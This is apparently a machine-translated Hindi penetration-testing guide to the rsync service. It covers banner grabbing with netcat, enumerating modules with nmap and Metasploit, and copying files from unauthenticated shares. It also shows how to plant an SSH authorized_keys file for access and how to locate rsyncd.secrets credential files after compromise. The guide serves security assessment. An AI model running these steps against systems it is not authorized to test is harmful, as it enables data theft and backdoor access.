मूल जानकारी

wikipedia से:

rsync एक उपयुक्ति है जो एक कंप्यूटर और एक बाह्य हार्ड ड्राइव के बीच और नेटवर्क कंप्यूटरों के बीच फ़ाइलें को स्थानांतरित और समकालीन करने के लिए समय की संशोधन और फ़ाइलों के आकार की तुलना करके करता है। यह आम तौर पर Unix-जैसे ऑपरेटिंग सिस्टम पर पाया जाता है। rsync एल्गोरिथ्म एक प्रकार का डेल्टा इन्कोडिंग है, और नेटवर्क उपयोग को कम करने के लिए उपयोग किया जाता है। Zlib को अतिरिक्त डेटा संकुचन के लिए उपयोग किया जा सकता है, और सुरक्षा के लिए SSH या stunnel का उपयोग किया जा सकता है।

डिफ़ॉल्ट पोर्ट: 873

PORT    STATE SERVICE REASON
873/tcp open  rsync   syn-ack

जांच

बैनर और मैन्युअल संचार

nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection


#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password

साझा फोल्डरों की जाँच करना

Rsync मॉड्यूल को डायरेक्टरी साझाकरण के रूप में मान्यता प्राप्त होती है जो पासवर्ड से सुरक्षित हो सकती हैं। उपलब्ध मॉड्यूल्स की पहचान करने और यह जांचने के लिए कि क्या उन्हें पासवर्ड की आवश्यकता है, निम्नलिखित कमांडों का उपयोग किया जाता है:

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730

होशियार रहें कि कुछ शेयर सूची में नहीं दिख सकते, शायद वे छिपे हुए हों। इसके अतिरिक्त, कुछ शेयर विशेष प्रमाण-पत्र द्वारा प्रतिबंधित हो सकते हैं, जिसे "पहुंच निषेध" संदेश से दिखाया जा सकता है।

ब्रूट फोर्स

मैन्युअल Rsync उपयोग

एक मॉड्यूल सूची प्राप्त करने पर, क्रियाएँ प्रमाणीकरण की आवश्यकता पर निर्भर करती हैं। प्रमाणीकरण के बिना, एक साझा फ़ोल्डर से फ़ाइलों की सूचीकरण और कॉपी को स्थानीय निर्देशिका में प्राप्त किया जा सकता है:

# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name

# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared

यह प्रक्रिया फ़ाइलों को रूपांतरित करती है , उनकी गुणवत्ता और अनुमतियों को संरक्षित रखती है।

क्रेडेंशियल्स के साथ, साझा फ़ोल्डर से सूचीबद्ध करना और डाउनलोड करना निम्नलिखित रूप में किया जा सकता है, जहां एक पासवर्ड प्रॉम्प्ट प्रकट होगा:

rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared

उपभोक्ता को निम्नलिखित उपयोग करके सामग्री अपलोड करने के लिए, जैसे कि authorized_keys फ़ाइल के लिए, उपयोग करें:

rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh

POST

आरसिंकडी कॉन्फ़िगरेशन फ़ाइल को ढूंढने के लिए, निष्पादित करें:

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)

इस फ़ाइल में, एक सीक्रेट्स फ़ाइल पैरामीटर एक फ़ाइल का पता लगा सकता है जिसमें rsyncd प्रमाणीकरण के लिए उपयोगकर्ता नाम और पासवर्ड हो सकते हैं।

संदर्भ

• https://www.smeegesec.com/2016/12/pentesting-rsync.html